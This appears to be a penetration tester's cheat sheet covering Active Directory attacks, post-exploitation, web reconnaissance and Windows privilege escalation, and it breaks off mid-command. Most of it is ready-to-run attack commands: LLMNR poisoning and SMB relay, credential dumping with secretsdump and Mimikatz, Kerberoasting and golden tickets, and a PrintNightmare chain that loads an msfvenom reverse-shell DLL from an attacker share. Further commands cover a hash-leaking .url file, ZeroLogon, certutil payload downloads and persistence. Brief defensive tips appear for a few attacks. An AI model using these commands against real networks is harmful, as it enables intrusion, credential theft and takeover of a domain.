Active Directory Attacks
LLMNR Poisoning
Link local multicast name resolution, used when DNS fails to resolve a hostname, can be an easy win if LLMNR is not disabled in the environment and users have weak credentials. Use responder from the impacket suite to listen on an interface, works better at times with high traffic..
1
Python responder.py -I eth0 -rdwv
If certain events occur, you can obtain a username and NTLM hash, which can be cracked with john or hashcat.
1
john --wordlist=/path/to/rockyou.txt /path/to/hash.txt
hashcat -m 5600 /path/to/hash.txt /path/to/rockyou.txt (5600 is the module for NTLMv2)
Hashcat binary can be downloaded here, and should be ran on base OS.
Defending against LLMNR attacks
Best defense against this attack is to simply disable LLMNR and NBT-NS, if they can not be disabled then strong access controls and strong passwords should be enforced on the network.
SMB Relay Attacks
Instead of cracking the hash, we can also use it to gain access to a machine if our stolen user hash represents a local admin on the target machine. SMB signing must be disabled for this to work.
Edit the responder.conf file and turn off SMB and HTTP servers, run responder –> responder is only capturing hashes, ntlmrelayx will do the actual relay.
1
python ntlmrelayx.py -tf targets.txt -smb2support
Can dump the SAM file –> get access to local user hashes.
Add -i argument to get an interactive shell spawned on your machine. “started interacvtive SMB client shell via TCP on localhost:11000” -> use netcat to interract, can view/modify/
Enumerating hosts with SMB signing disabled
1
nmap --script=smb2-security-mode.nse -p 445 192.168.1.0/24
Disabled by default on workstations, enabled and required by default on servers. enabled but not required = vulnerable.
Defending against SMB relay attacks
Enable SMB signing on all devices, disable NTLM authentication, account tiering (least priv.), local admin restriction.
IPv6 Attacks
Clone MiTM6 and run “pip3 install” in the directory.
Starting by running
1
mitm6 -d domain.local
and concurrently run
1
ntlmrelayx.py -6 -t ldaps://dc.ip.add.res -wh fakewpad.domain.local -l lootme
Very extensive tool, can create new users/update ACLs, dump creds, gather info, etc.
Post Compromise Enumeration
PowerView
Download on victim machine, and run
powershell.exe -ep bypass
.\PowerView.ps1
Get-NetDomain - gives general information about the domain, forest name, DCs, etc.
Get-NetDomainController - gives more specific information about the DCs, IP addresses, names, etc.
Get-DomainPolicy - can see GPs on the domain, Kerberos, System Access, version,
(Get-DomainPolicy)”system access” - can see the system access policies: min. password age, password complexity, password length, etc.
Get-NetUser - dumps info on all users
Get-NetUser | select cn - will give users |
Get-NetUser | select samaccountname - will give account names |
Get-UserProperty - lists all potential user properties
Get-UserProperty -Properties pwdlastset - will show when all users had their passwords last reset
Get-UserProperty -Properties logoncount - can potentially find honeypot accounts with low logon #s
Get-NetComputer - will list all computers
Get-NetComputer -FullData - will dump tons of info about all computers
Get-NetComputer -FullData | select OperatingSystem - will show all computer operating systems |
Get-NetGroup - shows groups
Get-NetGroup -GroupName “Domain Admins”
Get-NetGroupMember -GroupName “Domain Admins”
Invoke-ShareFinder - SMB enum
Get-NetGPO
Get-NetGPO | select displayname, whenchanged |
Bloodhound
Downloads data from AD and displays it in GUI, figures out shortest path to DA.
1
2
3
apt install bloodhound;
neo4j console;
bloodhound
After changing the default password, you can start pulling data from the environment by downloading sharphound on the victim machine.
powershell -ep bypass
1
2
.\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain Domain.local -ZipFileName file.zip
Transfer the file to attack machine, and upload it to bloodhound.
Post Compromise Attacks
Pass the Hash / Pass
1
crackmapexec 10.10.10.0/24 -u user -d DOMAIN -p password
Will spray the network with the user’s creds, can be done with the user’s password hash as well.
1
2
3
crackmapexec smb 10.10.10.0/24 -u "user" -H hash --local-auth
or
psexec.py "user":@ipaddress -hashes <hash>
Dumping Hashes with secretsdump.py
1
secretsdump.py domain/user:pass@ipaddress
can dump SAM hashes, LSA secrets, api keys.
1
hashcat64.exe -m 1000 hashes.txt rockyou.txt
-m 1000 is for NTLM
Token Impersonation
A token is a temporary key that allows you to access a system or network without having to provide creds for every action you take. There are 2 types of tokens:
- Delegate- Created for logging into a machine or using RDP
- Impersonate- “Non-interactive” such as attaching a network drive or a domain logon script.
How to do it with metasploit-
1
2
3
4
5
6
7
8
9
10
11
msfconsole
use exploit/windows/smb/psexec
set rhosts <dc ip address>
set smbdomain <domain.local>
set smbpass <pass>
set smbuser <user>
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run
If all is good, you’ll be in a shell, lots of tools we can load like mimikatz, powershell, incognito. If a user has logged into the machine, you may be able to impersonate them with their token using incognito.
1
2
3
4
load incognito
list_tokens -u
impersonate_token <domain>\\<user>
shell
will place you in a shell as the new user.
1
rev2self
to revert to your original shell.
Kerberoasting
How Kerberos works - suppose a user is attempting to access an application server.
- User requests a TGT (Ticket Granting Ticket) from the domain controller (key distribution center), the KDC verifies the username and NTLM hash.
- If the credentials are valid, the user receives TGT from the DC, encrypted with the krbtgt hash.
- The user provides the TGT back to the DC, this time requesting a TGS (Ticket Granting Service Ticket)
- DC verifies TGT by decrypting with it’s own hash, then sends the user a TGS encrypted with the application server’s hash.
- User sends the encrypted TGS to the application server, who can decrypt it with it’s own hash and authenticate the user.
- User and Application server have now mutually authenticated each other securely, good job Microsoft!
In short, valid creds -> TGT -> TGS -> access to service
Instead of using the TGS to authenticate to a server, we can crack the hash and BECOME the server.
1
python GetUserSPNs.py domain.local/user:pass -dc-ip <dc ip> -request
Requests a service ticket and sends you the hash, which can be cracked with hashcat (-m 13100 for krb-TGS). Because we are exploiting a feature of Kerberos, you can not prevent this attack; it can only mitigated with strong passwords (30 characters+ for service accounts) and following the rules of least privilege.
GPP / cPassword Attacks
Group Policy Preferences allowed admins to create policies using embedded credentials. These creds would be encrypted and placed in the “Groups.xml” file, which resides in the SYSVOL folder and can be read by any user. This file will contain the encrypted “cPassword”, which can be decrypted easily using gpp-decrypt (default on Kali). Can use Invoke-GPP to check for this automatically. Always look for this on older servers, could be an easy win.
URL Attacks
Need access to a file share to do this, either through a user account (post exploit) or on a wide open share (less likely). Make a file that contains this-
1
2
3
4
5
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<attackbox IP>\%USERNAME%.icon
IconIndex=1
The name of the file is important, it must start with an @ or ~ to ensure that it is placed alphabetically at the top of the directory, and must end with the .url extension. The name should be something relevant to the company - “@Q4 financials.url”. Save as type “all files”. When users navigate to the directory, their hash will be sent over to the attackbox, which can be picked up with a responder listener.
Print Nightmare (CVE-2021-1675)
Use rpcdump.py from impacket to scan for potentially vulnerable hosts.If it returns a value, it could be vulnerable.
1
rpcdump.py @<Victim IP> | egrep 'MS-RPRN|MS-PAR'
use msfvenom to generate a payload and msfconsole to set the listener
1
2
3
4
5
6
7
8
9
msfvenom -p windows/x64/windows/reverse_tcp LHOST=<listener IP> LPORT=<port> -f dll > shell.dll
msfconsole
use multi/handler
options
set payload windows/x64/windows/reverse_tcp
options
set lport <lport>
set lhost <listener IP>
run
Now we need to host our dll so the target can reach it
1
smbserver.py share 'pwd' -smb2support
Now we just need a user/pass combination (does not have to be administrator).
1
python3 CVE-2021-1675.py domain.local/<user>:<password>@<dc ip> '\\<attack box IP>\share\shell.dll'
Should get a meterpreter shell on your listener, can proceed with the usual, getuid, hashdump, etc. Most AV will pick up the shell.dll if you don’t obfuscate it in some way.
Mimikatz
A tool built in C used to steal credentials, generate Krb tickets, and leverage attacks such as pass the hash, pass the ticket, golden ticket, etc. Very extensive tool. Use on DC post compromise.
mimikatz.exe
privilege::debug
“Privilege ‘20’ OK” -> good to go
sekurlsa::logonpasswords
Will show computer username/NTLM hash for it, as well as any user who has logged in since last reboot, dumps this information from memory. Can pass the computer’s NTLM hash (not v2) and see if it gives access anywhere on the domain. If a DA has logged into the computer, you can potentially pass their hash or try to crack it.
lsadump::sam
or
lsadump::sam /patch
Doesn’t always work, can try different ways, metasploit, secretsdump, etc.
lsadump::lsa /patch
LSA= local security authority, dumping it will show usernames/ntlm hashes.
Golden Ticket attack with Mimikatz
Golden ticket = complete access to the ENTIRE domain
mimikatz.exe
lsadump::lsa /inject /name:krbtgt
Need to grab 2 things from the output:
S-ID of the domain (looks like S-1-5-32-1045337234-12924708993-5683276719-19000) NTLM hash of the Krbtgt
kerberos::golden /User:Administrator /domain:<domain.local> /sid:<SID> /krbtgt:<krbtgt ntlm hash> /id:500 /ptt
id 500 is associated with Admin, and /ptt specifies pass the ticket. Output should say “golden ticket for ‘Administrator @
misc::cmd
dir \\<machine>\<drive> jkhdf
or
psexec.exe \\<machine> cmd.exe
Golden ticket can be used for persistence as well.
Zero Logon
CVE-2020-1472. Dangerous attack to run in an environment, sets the DC password to null, if you don’t reset the password you can break the server.
1
2
./zerologon_tester.py <DC netbios name> <DC IP>
python3 cve-2020-1472-exploit.py <DC netbios name> <DC IP>
Use hexpass and restorepassword.py to restore the DC. Easy attack to pull off, scary in the real world.
Post Exploitation
File Transfers
Certutil
certutil.exe -urlcache -f http://<attackbox IP>/malicious.txt malicious.txt
FTP
1
2
python -m pyftpdlib 21
ftp <attacker ip>
Meterpreter shell also has built in ways to upload/download files.
Maintaining Access
Persistence Scripts:
run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
Scheduled Tasks
run scheduleme
run schtaskabuse
Add a User
net user username password /add
Pivoting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msfconsole
use exploit/windows/smb/psexec
options
set rhosts <victim ip>
set smbpass <password>
set smbuser <user>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <interface>
set target 2
run
shell
route print
arp -a
^C y
run autoroute -s <unreachable subnet>/24
run autoroute -p
background
proxychains, chisel, ssh, lots of different tools.
Clean up
Make the system as it was when you entered it: remove executables, scripts, added files or users, malware, rootkits, and revert settings to their original configuration.
Web Applications
Email Enumeration
hunter(.)io
phonebook(.)cz
tools(.)verifyemailaddress(.)io
Subdomain Enumeration
1
sublist3r -d corp(dot)com
crt(.)sh %.corp.com, does certificate fingerprinting.
Asset Finder
1
2
go get -u github.com/tomnomnom/assetfinder (Use pimpmykali to fix Go first)
assetfinder domain.com >> output.txt
Amass
1
2
3
export GO111MODULE=on
go get -v -u github.com/OWASP/AMmass/v3/...
amass enum -d domain.com >> subs.txt
httprobe checks if domains are up
1
2
go get -u github.com/tomnomnom/httprobe
cat subdomains.txt | httprobe -s -p https://443
Host Discovery
1
netdiscover -r x.x.x.0/24 will sweep an entire subnet.
OWASP top 10
Injection
Broken Authentication
Sensitive Data Exposure
XML External Entities (XXE)
Broken Access Control
Security Misconfiguration
Cross-Site Scripting
Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging and Monitoring
Windows Privilege Escalation
Initial Enumeration
Systeminfo command will show basic systeminfo, can refine it more with
systeminfo | findstr /B /C:"OS NAME" /C:"OS VERSION" /C:"System Type"
Can see what version of windows is running, what architecture, etc.
wmic qfe get Caption,Description,HotFixID,InstalledOn
Will show information regarding latest updates.
wmic logicaldisk get caption,description,providername
Will show drives available
User Enumeration
whoami /groups and net user are good ones to run, net localgroup, net localgroup administrators
Network Enumeration
Ipconfig /all , basic network info, might give info on domain.
arp -a and route print also give good info
netstat -ano
Password Hunting
findstr /si password *.txt , *.ini *config
AV Enumeration
sc query windefend
Will show if Windows Defender is running
sc queryex type= service
Will show all services running on machine.
netsh advfirewall dump
or
netsh firewall show state
Will show firewall information.
netsh firewall show config
Shows firewall config
run post/multi/recon/local_exploit_suggester - random metasploit info
Kernel Exploits
Kernel is a program that controls everything in the system. Facilitates interactions between hardware and software components, acts as a translator.
https://github(.)com/SecWiki/windows-kernel-exploits
``` msfvenom -p windows/shell_reverse_tcp LHOST=